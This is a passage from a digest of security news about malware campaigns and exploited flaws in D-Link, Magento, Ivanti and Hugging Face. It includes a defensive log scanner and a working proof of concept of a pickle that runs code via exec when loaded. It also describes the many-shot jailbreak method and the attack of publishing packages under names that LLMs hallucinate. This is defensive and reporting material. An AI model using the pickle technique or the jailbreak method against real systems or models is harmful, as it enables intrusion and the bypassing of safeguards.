"While Venom RAT's primary program may appear straightforward, it maintains communication channels with the C2 server to acquire additional plugins for various activities," security researcher Cara Lin said. This includes Venom RAT v6.0.3 with keylogger capabilities, NanoCore RAT, XWorm, and Remcos RAT.
"This [Remcos RAT] plugin was distributed from VenomRAT's C2 using three methods: an obfuscated VBS script named 'remcos.vbs,' ScrubCrypt, and Guloader PowerShell," Lin added.
Also delivered using the plugin system is a stealer that gathers information about the system and exfiltrates data from folders associated with wallets and applications like Atomic Wallet, Electrum, Ethereum, Exodus, Jaxx Liberty (retired as of March 2023), Zcash, Foxmail, and Telegram to a remote server.
"This analysis reveals a sophisticated attack leveraging multiple layers of obfuscation and evasion techniques to distribute and execute VenomRAT via ScrubCrypt," Lin said.
"The attackers employ a variety of methods, including phishing emails with malicious attachments, obfuscated script files, and Guloader PowerShell, to infiltrate and compromise victim systems. Furthermore, deploying plugins through different payloads highlights the versatility and adaptability of the attack campaign."
Critical Flaws Leave 92,000 D-Link NAS Devices Vulnerable to Malware Attacks
9.4.24
Vulnerability
The Hacker News
Threat actors are actively scanning and exploiting a pair of security flaws that are said to affect as many as 92,000 internet-exposed D-Link network-attached storage (NAS) devices.
Tracked as CVE-2024-3272 (CVSS score: 9.8) and CVE-2024-3273 (CVSS score: 7.3), the vulnerabilities impact legacy D-Link products that have reached end-of-life (EoL) status. D-Link, in an advisory, said it does not plan to ship a patch and instead urges customers to replace them.
"The vulnerability lies within the nas_sharing.cgi uri, which is vulnerable due to two main issues: a backdoor facilitated by hard-coded credentials, and a command injection vulnerability via the system parameter," security researcher who goes by the name netsecfish said in late March 2024.
Successful exploitation of the flaws could lead to arbitrary command execution on the affected D-Link NAS devices, granting threat actors the ability to access sensitive information, alter system configurations, or even trigger a denial-of-service (DoS) condition.
The issues affect the following models -
DNS-320L
DNS-325
DNS-327L, and
DNS-340L
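A defender-side check for the pattern described above, added here as an example (not netsecfish's, GreyNoise's or D-Link's code): it parses web-server access logs in combined format and flags every request that reaches nas_sharing.cgi, separating those that carry the system parameter the report names. The log lines are constructed, and the /cgi-bin/ path prefix is an assumption; the match keys only on the CGI name and the parameter name.

```python
"""Flag access-log entries that reach the D-Link nas_sharing.cgi endpoint.

Added example; the log lines are constructed. Only the CGI name and the 'system'
parameter named in the report are used for matching; the /cgi-bin/ prefix in the
samples is an assumption.
"""
import re
from typing import Optional
from urllib.parse import parse_qs, unquote, urlsplit

# Combined log format: client ident user [timestamp] "METHOD target HTTP/x" status bytes "referer" "UA"
_LINE_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: [^"]*)?" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

ENDPOINT = "nas_sharing.cgi"  # the CGI the advisory names
INJECTION_PARAM = "system"    # the parameter the report ties to command injection


def classify_request(target: str) -> Optional[str]:
    """Label one request target, or return None when it does not touch the endpoint.

    Path and parameter names are percent-decoded and lower-cased first so that
    trivially re-encoded probes (e.g. nas%5Fsharing.CGI, SYSTEM=) still match.
    """
    parts = urlsplit(target)
    if not unquote(parts.path).lower().endswith(ENDPOINT):
        return None
    params = {k.lower() for k in parse_qs(parts.query, keep_blank_values=True)}
    if INJECTION_PARAM in params:
        return f"{ENDPOINT} called with '{INJECTION_PARAM}' parameter: command-injection pattern"
    return f"{ENDPOINT} accessed: review for use of the hard-coded account"


def scan_log(lines):
    """Run classify_request over access-log lines; one finding dict per hit, in log order."""
    findings = []
    for line in lines:
        m = _LINE_RE.match(line)
        if m is None:  # not combined format; a real pipeline would count these separately
            continue
        label = classify_request(m["target"])
        if label is not None:
            findings.append({"client": m["client"], "ts": m["ts"],
                             "status": m["status"], "label": label})
    return findings


# Constructed sample log (RFC 5737 documentation addresses, placeholder parameter values).
SAMPLE_LOG = [
    '203.0.113.7 - - [09/Apr/2024:10:21:04 +0000] "GET /cgi-bin/nas_sharing.cgi?system=CONSTRUCTED HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [09/Apr/2024:10:21:09 +0000] "GET /cgi-bin/nas_sharing.cgi HTTP/1.1" 401 0 "-" "curl/8.0"',
    '192.0.2.15 - - [09/Apr/2024:10:22:31 +0000] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '192.0.2.15 - - [09/Apr/2024:10:22:40 +0000] "POST /cgi-bin/other.cgi HTTP/1.1" 200 64 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [09/Apr/2024:10:23:02 +0000] "GET /cgi-bin/NAS%5Fsharing.CGI?SYSTEM=CONSTRUCTED HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding["ts"], finding["client"], finding["status"], finding["label"])
```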
Threat intelligence firm GreyNoise said it observed attackers attempting to weaponize the flaws to deliver the Mirai botnet malware, thus making it possible to remotely commandeer the D-Link devices.
In the absence of a fix, the Shadowserver Foundation is recommending that users either take these devices offline or have remote access to the appliance firewalled to mitigate potential threats.
The findings once again illustrate that Mirai botnets are continuously adapting and incorporating new vulnerabilities into their repertoire, with threat actors swiftly developing new variants that are designed to abuse these issues to breach as many devices as possible.
With network devices becoming common targets for financially motivated and nation-state-linked attackers, the development comes as Palo Alto Networks Unit 42 revealed that threat actors are increasingly switching to malware-initiated scanning attacks to flag vulnerabilities in target networks.
"Some scanning attacks originate from benign networks likely driven by malware on infected machines," the company said.
"By launching scanning attacks from compromised hosts, attackers can accomplish the following: Covering their traces, bypassing geofencing, expanding botnets, [and] leveraging the resources of these compromised devices to generate a higher volume of scanning requests compared to what they could achieve using only their own devices."
Google Chrome Adds V8 Sandbox - A New Defense Against Browser Attacks
9.4.24
Safety
The Hacker News
Google has announced support for what's called a V8 Sandbox in the Chrome web browser in an effort to address memory corruption issues.
The sandbox, according to V8 security technical lead Samuel Groß, aims to prevent "memory corruption in V8 from spreading within the host process."
The search behemoth has described V8 Sandbox as a lightweight, in-process sandbox for the JavaScript and WebAssembly engine that's designed to mitigate common V8 vulnerabilities.
The idea is to limit the impact of V8 vulnerabilities by restricting the code executed by V8 to a subset of the process' virtual address space ("the sandbox") and isolating it from the rest of the process.
Shortcomings affecting V8 have accounted for a significant chunk of the zero-day vulnerabilities that Google has addressed between 2021 and 2023, with as many as 16 security flaws discovered over the time period.
"The sandbox assumes that an attacker can arbitrarily and concurrently modify any memory inside the sandbox address space as this primitive can be constructed from typical V8 vulnerabilities," the Chromium team said.
"Further, it is assumed that an attacker will be able to read memory outside of the sandbox, for example, through hardware side channels. The sandbox then aims to protect the rest of the process from such an attacker. As such, any corruption of memory outside of the sandbox address space is considered a sandbox violation."
Groß emphasized the challenges with tackling V8 vulnerabilities by switching to a memory-safe language like Rust or hardware memory safety approaches, such as memory tagging, given the "subtle logic issues" that can be exploited to corrupt memory, unlike classic memory safety bugs like use-after-frees, out-of-bounds accesses, and others.
"Nearly all vulnerabilities found and exploited in V8 today have one thing in common: the eventual memory corruption necessarily happens inside the V8 heap because the compiler and runtime (almost) exclusively operate on V8 HeapObject instances," Groß said.
Given that these issues cannot be protected by the same techniques used for typical memory-corruption vulnerabilities, the V8 Sandbox is designed to isolate V8's heap memory such that should any memory corruption occur, it cannot escape the security confines to other parts of the process' memory.
This is accomplished by replacing all data types that can access out-of-sandbox memory with "sandbox-compatible" alternatives, thereby effectively preventing an attacker from accessing other memory. The sandbox can be enabled by setting "v8_enable_sandbox" to true in the gn args.
Benchmark results from Speedometer and JetStream show that the security feature adds an overhead of about 1% on typical workloads, allowing it to be enabled by default starting with Chrome version 123, spanning Android, ChromeOS, Linux, macOS, and Windows.
"The V8 Sandbox requires a 64-bit system as it needs to reserve a large amount of virtual address space, currently one terabyte," Groß said.
"The sandbox is motivated by the fact that current memory safety technologies are largely inapplicable to optimizing JavaScript engines. While these technologies fail to prevent memory corruption in V8 itself, they can in fact protect the V8 Sandbox attack surface. The sandbox is therefore a necessary step towards memory safety."
The development comes as Google highlighted the role of Kernel Address Sanitizer (KASan) in detecting memory bugs in native code and helping harden Android firmware security, adding that it used the compiler-based tool to discover more than 40 bugs.
"Using KASan enabled builds during testing and/or fuzzing can help catch memory corruption vulnerabilities and stability issues before they land on user devices," Eugene Rodionov and Ivan Lozano from the Android team said.
Watch Out for 'Latrodectus' - This Malware Could Be In Your Inbox
8.4.24
Virus
The Hacker News
Threat hunters have discovered a new malware called Latrodectus that has been distributed as part of email phishing campaigns since at least late November 2023.
"Latrodectus is an up-and-coming downloader with various sandbox evasion functionality," researchers from Proofpoint and Team Cymru said in a joint analysis published last week, adding it's designed to retrieve payloads and execute arbitrary commands.
There is evidence to suggest that the malware is likely written by the same threat actors behind the IcedID malware, with the downloader put to use by initial access brokers (IABs) to facilitate the deployment of other malware.
Latrodectus has been primarily linked to two different IABs tracked by Proofpoint under the names TA577 (aka Water Curupira) and TA578, the former of which has also been linked to the distribution of QakBot and PikaBot.
As of mid-January 2024, it's been employed almost exclusively by TA578 in email threat campaigns, in some cases delivered via a DanaBot infection.
TA578, known to be active since at least May 2020, has been linked to email-based campaigns delivering Ursnif, IcedID, KPOT Stealer, Buer Loader, BazaLoader, Cobalt Strike, and Bumblebee.
Attack chains leverage contact forms on websites to send legal threats regarding alleged copyright infringement to targeted organizations. The links embedded in the messages direct the recipients to a bogus website to trick them into downloading a JavaScript file that's responsible for launching the main payload using msiexec.
"Latrodectus will post encrypted system information to the command-and-control server (C2) and request the download of the bot," the researchers said. "Once the bot registers with the C2, it sends requests for commands from the C2."
It also comes with capabilities to detect if it's running in a sandboxed environment by checking if the host has a valid MAC address and there are at least 75 running processes on systems running Windows 10 or newer.
Like in the case of IcedID, Latrodectus is designed to send the registration information in a POST request to the C2 server where the fields are HTTP parameters stringed together and encrypted, after which it awaits further instructions from the server.
The commands allow the malware to enumerate files and processes, execute binaries and DLL files, run arbitrary directives via cmd.exe, update the bot, and even shut down a running process.
A further examination of the attacker infrastructure reveals that the first C2 servers came alive on September 18, 2023. These servers, in turn, are configured to communicate with an upstream Tier 2 server that was set up around August 2023.
Latrodectus' connections to IcedID stem from the fact that the T2 server "maintains connections with backend infrastructure associated with IcedID" and from the use of jump boxes previously associated with IcedID operations.
"Latrodectus will become increasingly used by financially motivated threat actors across the criminal landscape, particularly those who previously distributed IcedID," Team Cymru assessed.
Cybercriminals Targeting Latin America with Sophisticated Phishing Scheme
8.4.24
Phishing
The Hacker News
A new phishing campaign has set its eyes on the Latin American region to deliver malicious payloads to Windows systems.
"The phishing email contained a ZIP file attachment that when extracted reveals an HTML file that leads to a malicious file download posing as an invoice," Trustwave SpiderLabs researcher Karla Agregado said.
The email message, the company said, originates from an email address format that uses the domain "temporary[.]link" and has Roundcube Webmail listed as the User-Agent string.
The HTML file contains a link ("facturasmex[.]cloud") that displays an error message saying "this account has been suspended," but when visited from an IP address geolocated to Mexico, loads a CAPTCHA verification page that uses Cloudflare Turnstile.
This step paves the way for a redirect to another domain from where a malicious RAR file is downloaded. The RAR archive comes with a PowerShell script that gathers system metadata as well as checks for the presence of antivirus software in the compromised machine.
It also incorporates several Base64-encoded strings that are designed to run PHP scripts to determine the user's country and retrieve a ZIP file from Dropbox containing "many highly suspicious files."
Trustwave said the campaign exhibits similarities with that of Horabot malware campaigns that have targeted Spanish-speaking users in Latin America in the past.
"Understandably, from the threat actors' point of view, phishing campaigns always try different [approaches] to hide any malicious activity and avoid immediate detection," Agregado said.
"Using newly created domains and making them accessible only in specific countries is another evasion technique, especially if the domain behaves differently depending on their target country."
The development comes as Malwarebytes revealed a malvertising campaign targeting Microsoft Bing search users with bogus ads for NordVPN that lead to the distribution of a remote access trojan called SectopRAT (aka ArechClient) hosted on Dropbox via a phony website ("besthord-vpn[.]com").
"Malvertising continues to show how easy it is to surreptitiously install malware under the guise of popular software downloads," security researcher Jérôme Segura said. "Threat actors are able to roll out infrastructure quickly and easily to bypass many content filters."
It also follows the discovery of a fake Java Access Bridge installer that serves as a conduit to deploy the open-source XMRig cryptocurrency miner, per SonicWall.
The network security company said it also discovered a Golang malware that "uses multiple geographic checks and publicly available packages to screenshot the system before installing a root certificate to the Windows registry for HTTPS communications to the [command-and-control server]."
Google Sues App Developers Over Fake Crypto Investment App Scam
8.4.24
Cryptocurrency
The Hacker News
Google has filed a lawsuit against two app developers for engaging in an "international online consumer investment fraud scheme" that tricked users into downloading bogus Android apps from the Google Play Store and other sources and stealing their funds under the guise of promising higher returns.
The individuals in question are Yunfeng Sun (aka Alphonse Sun) and Hongnam Cheung (aka Zhang Hongnim or Stanford Fischer), who are believed to be based in Shenzhen and Hong Kong, respectively.
The defendants are said to have uploaded about 87 crypto apps to the Play Store to pull off the social engineering scam since at least 2019, with over 100,000 users downloading them and leading to substantial financial losses.
"The gains conveyed by the apps were illusory," the tech giant said in its complaint. "And the scheme did not end there."
"Instead, when individual victims attempted to withdraw their balances, defendants and their confederates would double down on the scheme by requesting various fees and other payments from victims that were supposedly necessary for the victims to recover their principal investments and purported gains."
While this kind of scam is typically referred to as pig butchering (aka shā zhū pán), Google said it "neither adopts nor endorses the use of this term." It's derived from the idea that victims are fattened up like hogs with the promise of lucrative returns before "slaughtering" them for their assets.
In September 2023, the U.S. Financial Crimes Enforcement Network (FinCEN) said these scams are perpetrated by criminal enterprises based in Southeast Asia that employ hundreds of thousands of people who are trafficked to the region by promising them high-paying jobs.
The fraudulent scheme entails the scammers using elaborate fictitious personas to target unsuspecting individuals via social media or dating platforms, enticing them with the prospect of a romantic relationship to build trust and convince them to invest in cryptocurrency portfolios that purport to offer high profits within a short span of time with an aim to steal their funds.
To create the appearance of legitimacy, the financially motivated actors are known to fabricate websites and mobile apps to display a bogus investment portfolio with large returns.
Sun and Cheung, said Google, lured victim investors to download their fraudulent apps through text messages using Google Voice to target victims in the U.S. and Canada. Other distribution methods include affiliate marketing campaigns that offer commissions for "signing up additional users" and YouTube videos promoting the fake investment platforms.
The company described the malicious activity as persistent and continuing, with the defendants "using varying computer network infrastructure and accounts to obfuscate their identities, and making material misrepresentations to Google in the process."
It also accused them of violating the Racketeer Influenced and Corrupt Organizations Act (RICO), carrying out wire fraud, and breaching the Google Play App Signing Terms of Service, Developer Program Policies, YouTube's Community Guidelines, as well as the Google Voice Acceptable Use Policy.
"Google Play can continue to be an app-distribution platform that users want to use only if users feel confident in the integrity of the apps," Google added. "By using Google Play to conduct their fraud scheme, defendants have threatened the integrity of Google Play and the user experience."
It's worth noting that the problem is not limited to the Android ecosystem alone, as prior reports show that such bogus apps have also repeatedly made their way to the Apple App Store.
The development is the latest in a series of legal actions that Google has taken to avoid the misuse of its products. In November 2023, the company sued multiple individuals in India and Vietnam for distributing fake versions of its Bard AI chatbot (now rebranded as Gemini) to propagate malware via Facebook.
Hackers Exploit Magento Bug to Steal Payment Data from E-commerce Websites
7.4.24
Exploit
The Hacker News
Threat actors have been found exploiting a critical flaw in Magento to inject a persistent backdoor into e-commerce websites.
The attack leverages CVE-2024-20720 (CVSS score: 9.1), which has been described by Adobe as a case of "improper neutralization of special elements" that could pave the way for arbitrary code execution.
It was addressed by the company as part of security updates released on February 13, 2024.
Sansec said it discovered a "cleverly crafted layout template in the database" that's being used to automatically inject malicious code to execute arbitrary commands.
"Attackers combine the Magento layout parser with the beberlei/assert package (installed by default) to execute system commands," the company said.
"Because the layout block is tied to the checkout cart, this command is executed whenever <store>/checkout/cart is requested."
The command in question is sed, which is used to insert a code execution backdoor that's then responsible for delivering a Stripe payment skimmer to capture and exfiltrate financial information to another compromised Magento store.
The development comes as the Russian government has charged six people for using skimmer malware to steal credit card and payment information from foreign e-commerce stores at least since late 2017.
The suspects are Denis Priymachenko, Alexander Aseyev, Alexander Basov, Dmitry Kolpakov, Vladislav Patyuk, and Anton Tolmachev. Recorded Future News reported that the arrests were made a year ago, citing court documents.
"As a result, members of the hacker group illegally took possession of information about almost 160 thousand payment cards of foreign citizens, after which they sold them through shadow internet sites," the Prosecutor General's Office of the Russian Federation said.
AI-as-a-Service Providers Vulnerable to PrivEsc and Cross-Tenant Attacks
7.4.24
AI
The Hacker News
New research has found that
artificial intelligence (AI)-as-a-service providers such as Hugging Face are
susceptible to two critical risks that could allow threat actors to escalate
privileges, gain cross-tenant access to other customers' models, and even take
over the continuous integration and continuous deployment (CI/CD) pipelines.
"Malicious models represent a major risk to AI systems, especially for AI-as-a-service providers because potential attackers may leverage these models to perform cross-tenant attacks," Wiz researchers Shir Tamari and Sagi Tzadik said.
"The potential impact is devastating, as attackers may be able to access the millions of private AI models and apps stored within AI-as-a-service providers."
The development comes as machine learning pipelines have emerged as a brand new supply chain attack vector, with repositories like Hugging Face becoming an attractive target for staging adversarial attacks designed to glean sensitive information and access target environments.
The threats are two-pronged, arising as a result of shared inference infrastructure takeover and shared CI/CD takeover. They make it possible to run untrusted models uploaded to the service in pickle format and take over the CI/CD pipeline to perform a supply chain attack.
The findings from the cloud security firm show that it's possible to breach the service running the custom models by uploading a rogue model and leverage container escape techniques to break out from its own tenant and compromise the entire service, effectively enabling threat actors to obtain cross-tenant access to other customers' models stored and run in Hugging Face.
"Hugging Face will still let the user infer the uploaded Pickle-based model on the platform's infrastructure, even when deemed dangerous," the researchers elaborated.
This essentially permits an attacker to craft a PyTorch (Pickle) model with arbitrary code execution capabilities upon loading and chain it with misconfigurations in the Amazon Elastic Kubernetes Service (EKS) to obtain elevated privileges and laterally move within the cluster.
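The loading step is what makes a pickle-based model dangerous: pickle is a small stack machine, and a file can name any importable callable for the loader to invoke. The Python below is an added illustration, not code from Wiz or Hugging Face. It builds a "model" whose pickle calls builtins.exec on load, shows that a default pickle.loads runs it, and contrasts two defences: a static opcode scan that lists which globals a file would import without loading it, and a restricted unpickler that only resolves an allow-listed set of globals. The allow-list, the MARKER environment variable and the payload are assumptions made for the example; the payload only sets an environment variable so its effect is observable without harm.

```python
import collections
import io
import os
import pickle
import pickletools

# Globals a loader may legitimately resolve for a plain weights file. Anything
# else (builtins.exec, os.system, subprocess.Popen, ...) is refused. This
# allow-list is an assumption for the example, not Hugging Face's policy.
ALLOWED_GLOBALS = {("collections", "OrderedDict")}

MARKER = "EXAMPLE_PICKLE_PWNED"   # assumed name; set by the payload below


class MaliciousModel:
    """Stand-in for a model object whose pickle runs code when loaded.

    __reduce__ tells pickle to rebuild the object by calling
    builtins.exec(<source>) instead of constructing a harmless object.
    """

    def __reduce__(self):
        payload = f"import os; os.environ['{MARKER}'] = '1'"
        return (exec, (payload,))


def build_malicious_pickle() -> bytes:
    return pickle.dumps(MaliciousModel(), protocol=4)


def build_benign_pickle() -> bytes:
    # Constructed stand-in for a state dict: layer name -> weights.
    weights = collections.OrderedDict(
        [("fc1.weight", [0.1, -0.2, 0.3]), ("fc1.bias", [0.0])]
    )
    return pickle.dumps(weights, protocol=4)


def unsafe_load(data: bytes):
    """Default behaviour of pickle.load (and torch.load): any global resolves."""
    return pickle.loads(data)


class RestrictedUnpickler(pickle.Unpickler):
    """Unpickler that only resolves globals on the allow-list."""

    def find_class(self, module, name):
        if (module, name) in ALLOWED_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"forbidden global {module}.{name}")


def safe_load(data: bytes):
    return RestrictedUnpickler(io.BytesIO(data)).load()


def is_rejected(data: bytes) -> bool:
    """True when the restricted loader refuses the file."""
    try:
        safe_load(data)
    except pickle.UnpicklingError:
        return True
    return False


def referenced_globals(data: bytes) -> set:
    """Static scan: every (module, name) the pickle would import, without
    executing it. Handles GLOBAL (protocol <= 3) and STACK_GLOBAL
    (protocol >= 4), whose operands are the two preceding string opcodes."""
    found = set()
    strings = []
    for op, arg, _pos in pickletools.genops(data):
        if op.name in ("SHORT_BINUNICODE", "BINUNICODE", "UNICODE"):
            strings.append(arg)
        elif op.name == "GLOBAL":
            module, name = arg.split(" ", 1)
            found.add((module, name))
        elif op.name == "STACK_GLOBAL":
            found.add((strings[-2], strings[-1]))
    return found


def marker_was_set() -> bool:
    return os.environ.get(MARKER) == "1"


if __name__ == "__main__":
    bad = build_malicious_pickle()
    print("globals referenced:", referenced_globals(bad))
    print("restricted loader rejects:", is_rejected(bad))
    unsafe_load(bad)
    print("default loader executed payload:", marker_was_set())
```

The opcode scan is the cheap gate a registry or CI job can run on every upload; the restricted unpickler is the runtime control when a pickle must be loaded at all. Neither substitutes for running untrusted models in a sandbox, and neither is needed for formats such as safetensors that carry no code.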
"The secrets we obtained could have had a significant impact on the platform if they were in the hands of a malicious actor," the researchers said. "Secrets within shared environments may often lead to cross-tenant access and sensitive data leakage."
To mitigate the issue, it's recommended to enable IMDSv2 with a hop limit (typically 1) so that pods cannot reach the Instance Metadata Service (IMDS) and assume the IAM role of the node they run on.
The research also found that it's possible to achieve remote code execution via
a specially crafted Dockerfile when running an application on the Hugging Face
Spaces service, and use it to pull and push (i.e., overwrite) all the images
that are available on an internal container registry.
Hugging Face, in coordinated disclosure, said it has addressed all the
identified issues. It's also urging users to employ models only from trusted
sources, enable multi-factor authentication (MFA), and refrain from using pickle
files in production environments.
"This research demonstrates that utilizing untrusted AI models (especially
Pickle-based ones) could result in serious security consequences," the
researchers said. "Furthermore, if you intend to let users utilize untrusted AI
models in your environment, it is extremely important to ensure that they are
running in a sandboxed environment."
The disclosure follows other research from Lasso Security showing that generative AI models like OpenAI ChatGPT and Google Gemini can recommend malicious (or non-existent) code packages to unsuspecting software developers. The attack is to collect package names the models hallucinate but that are not actually published, and to publish a trojanized package under such a name so that developers who follow the recommendation install the malware.
The phenomenon of AI package hallucinations underscores the need for exercising
caution when relying on large language models (LLMs) for coding solutions.
AI company Anthropic, for its part, has also detailed a new method called
"many-shot jailbreaking" that can be used to bypass safety protections built
into LLMs to produce responses to potentially harmful queries by taking
advantage of the models' context window.
"The ability to input increasingly-large amounts of information has obvious
advantages for LLM users, but it also comes with risks: vulnerabilities to
jailbreaks that exploit the longer context window," the company said earlier
this week.
The technique, in a nutshell, involves introducing a large number of faux
dialogues between a human and an AI assistant within a single prompt for the LLM
in an attempt to "steer model behavior" and respond to queries that it wouldn't
otherwise (e.g., "How do I build a bomb?").
From PDFs to Payload: Bogus Adobe Acrobat Reader Installers Distribute Byakugan Malware
5.4.24
Virus
The Hacker News
Bogus installers for Adobe Acrobat Reader are being used to distribute a new multi-functional malware dubbed Byakugan.
The starting point of the attack is a PDF file written in Portuguese that, when opened, shows a blurred image and asks the victim to click on a link to download the Reader application to view the content.
According to Fortinet FortiGuard Labs, clicking the URL leads to the delivery of an installer ("Reader_Install_Setup.exe") that activates the infection sequence. Details of the campaign were first disclosed by the AhnLab Security Intelligence Center (ASEC) last month.
The attack chain leverages techniques like DLL hijacking and Windows User Account Control (UAC) bypass to load a malicious dynamic-link library (DLL) file named "BluetoothDiagnosticUtil.dll," which, in turn, unleashes the final payload. It also deploys a legitimate installer for a PDF reader like Wondershare PDFelement.
The binary is equipped to gather and exfiltrate system metadata to a command-and-control (C2) server and drop the main module ("chrome.exe") from a different server that also acts as its C2 for receiving files and commands.
"Byakugan is a node.js-based malware packed into its executable by pkg," security researcher Pei Han Liao said. "In addition to the main script, there are several libraries corresponding to features."
This includes setting up persistence, monitoring the victim's desktop using OBS Studio, capturing screenshots, downloading cryptocurrency miners, logging keystrokes, enumerating and uploading files, and grabbing data stored in web browsers.
"There is a growing trend to use both clean and malicious components in malware, and Byakugan is no exception," Fortinet said. "This approach increases the amount of noise generated during analysis, making accurate detections more difficult."
The disclosure comes as ASEC revealed a new campaign that propagates the Rhadamanthys information stealer under the guise of an installer for groupware.
"The threat actor created a fake website to resemble the original website and exposed the site to the users using the ad feature in search engines," the South Korean cybersecurity firm said. "The malware in distribution uses the indirect syscall technique to hide from the eyes of security solutions."
It also follows a discovery that a manipulated version of Notepad++ is being employed by unidentified threat actors to propagate the WikiLoader malware (aka WailingCrab).
New Wave of JSOutProx Malware Targeting Financial Firms in APAC and MENA
5.4.24
Virus
The Hacker News
Financial organizations in the
Asia-Pacific (APAC) and Middle East and North Africa (MENA) are being targeted
by a new version of an "evolving threat" called JSOutProx.
"JSOutProx is a sophisticated attack framework utilizing both JavaScript and .NET," Resecurity said in a technical report published this week.
"It employs the .NET (de)serialization feature to interact with a core JavaScript module running on the victim's machine. Once executed, the malware enables the framework to load various plugins, which conduct additional malicious activities on the target."
First identified in December 2019 by Yoroi, early attacks distributing JSOutProx have been attributed to a threat actor tracked as Solar Spider. The operation has a track record of striking banks and other big companies in Asia and Europe.
In late 2021, Quick Heal Security Labs detailed attacks leveraging the remote access trojan (RAT) to single out employees of small finance banks from India. Other campaign waves have taken aim at Indian government establishments as far back as April 2020.
Attack chains are known to leverage spear-phishing emails bearing malicious JavaScript attachments masquerading as PDFs and ZIP archives containing rogue HTA files to deploy the heavily obfuscated implant.
"This malware has various plugins to perform various operations such as exfiltration of data, performing file system operations," Quick Heal noted [PDF] at the time. "Apart from that, it also has various methods with offensive capabilities that perform various operations."
The plugins allow it to harvest a wide range of information from the compromised host, control proxy settings, capture clipboard content, access Microsoft Outlook account details, and gather one-time passwords from Symantec VIP. A unique feature of the malware is its use of the Cookie header field for command-and-control (C2) communications.
JSOutProx also stands out for being a fully functional RAT implemented in JavaScript.
"JavaScript simply does not offer as much flexibility as a PE file does," Fortinet FortiGuard Labs said in a report released in December 2020, describing a campaign directed against governmental monetary and financial sectors in Asia.
"However, as JavaScript is used by many websites, it appears to most users as benign, as individuals with basic security knowledge are taught to avoid opening attachments that end in .exe. Also, because JavaScript code can be obfuscated, it easily bypasses antivirus detection, allowing it to filter through undetected."
The latest set of attacks documented by Resecurity entails using fake SWIFT or MoneyGram payment notifications to trick email recipients into executing the malicious code. The activity is said to have witnessed a spike starting February 8, 2024.
The artifacts have been observed hosted on GitHub and GitLab repositories, which have since been blocked and taken down.
"Once the malicious code has been successfully delivered, the actor removes the repository and creates a new one," the cybersecurity company said. "This tactic is likely related to the method the actor uses to manage multiple malicious payloads and differentiate targets."
The exact origins of the e-crime group behind the malware are presently unknown, although the victimology distribution of the attacks and the sophistication of the implant suggest that it originates from China or is affiliated with it, Resecurity posited.
The development comes as cyber criminals are promoting on the dark web new software called GEOBOX that repurposes Raspberry Pi devices for conducting fraud and anonymization.
Offered for only $80 per month (or $700 for a lifetime license), the tool allows the operators to spoof GPS locations, emulate specific network and software settings, mimic settings of known Wi-Fi access points, as well as bypass anti-fraud filters.
Such tools could have serious security implications as they open the door to a broad spectrum of crimes like state-sponsored attacks, corporate espionage, dark web market operations, financial fraud, anonymous distribution of malware, and even access to geofenced content.
"The ease of access to GEOBOX raises significant concerns within the cybersecurity community about its potential for widespread adoption among various threat actors," Resecurity said.
Researchers Identify Multiple China Hacker Groups Exploiting Ivanti Security Flaws
5.4.24
Vulnerability
The Hacker News
Multiple China-nexus threat actors
have been linked to the zero-day exploitation of three security flaws impacting
Ivanti appliances (CVE-2023-46805, CVE-2024-21887, and CVE-2024-21893).
The clusters are being tracked by Mandiant under the monikers UNC5221, UNC5266, UNC5291, UNC5325, UNC5330, and UNC5337. Another group linked to the exploitation spree is UNC3886.
The Google Cloud subsidiary said it has also observed financially motivated actors exploiting CVE-2023-46805 and CVE-2024-21887, likely in an attempt to conduct cryptocurrency mining operations.
"UNC5266 overlaps in part with UNC3569, a China-nexus espionage actor that has been observed exploiting vulnerabilities in Aspera Faspex, Microsoft Exchange, and Oracle Web Applications Desktop Integrator, among others, to gain initial access to target environments," Mandiant researchers said.
The threat actor has been linked to post-exploitation activity leading to the deployment of the Sliver command-and-control (C2) framework, a variant of the WARPWIRE credential stealer, and a new Go-based backdoor dubbed TERRIBLETEA that comes with command execution, keylogging, port scanning, file system interaction, and screen capturing functions.
UNC5330, which has been observed combining CVE-2024-21893 and CVE-2024-21887 to breach Ivanti Connect Secure VPN appliances at least since February 2024, has leveraged custom malware such as TONERJAM and PHANTOMNET for facilitating post-compromise actions -
PHANTOMNET - A modular backdoor that communicates using a custom communication protocol over TCP and employs a plugin-based system to download and execute additional payloads
TONERJAM - A launcher that's designed to decrypt and execute PHANTOMNET
Besides using Windows Management Instrumentation (WMI) to perform reconnaissance, move laterally, manipulate registry entries, and establish persistence, UNC5330 is known to compromise LDAP bind accounts configured on the infected devices in order to obtain domain admin access.
Another notable China-linked espionage actor is UNC5337, which is said to have
infiltrated Ivanti devices as early as January 2024 using CVE-2023-46805 and
CVE-2024 to deliver a custom malware toolset known as SPAWN that comprises four
distinct components that work in tandem to function as a stealthy and persistent
backdoor -
SPAWNSNAIL - A passive backdoor that listens on localhost and is equipped to launch an interactive bash shell as well as launch SPAWNSLOTH
SPAWNMOLE - A tunneler utility that's capable of directing malicious traffic to a specific host while passing benign traffic unmodified to the Connect Secure web server
SPAWNANT - An installer that's responsible for ensuring the persistence of SPAWNMOLE and SPAWNSNAIL by taking advantage of a coreboot installer function
SPAWNSLOTH - A log tampering program that disables logging and log forwarding to an external syslog server when the SPAWNSNAIL implant is running
Mandiant has assessed with medium confidence that UNC5337 and UNC5221 are one and the same threat group, noting the SPAWN tool is "designed to enable long-term access and avoid detection."
UNC5221, which was previously attributed to web shells such as BUSHWALK, CHAINLINE, FRAMESTING, and LIGHTWIRE, has also unleashed a Perl-based web shell referred to as ROOTROT that's embedded into a legitimate Connect Secure .ttc file located at "/data/runtime/tmp/tt/setcookie.thtml.ttc" by exploiting CVE-2023-46805 and CVE-2024-21887.
A successful deployment of the web shell is followed by network reconnaissance and lateral movement, in some cases, resulting in the compromise of a vCenter server in the victim network by means of a Golang backdoor called BRICKSTORM.
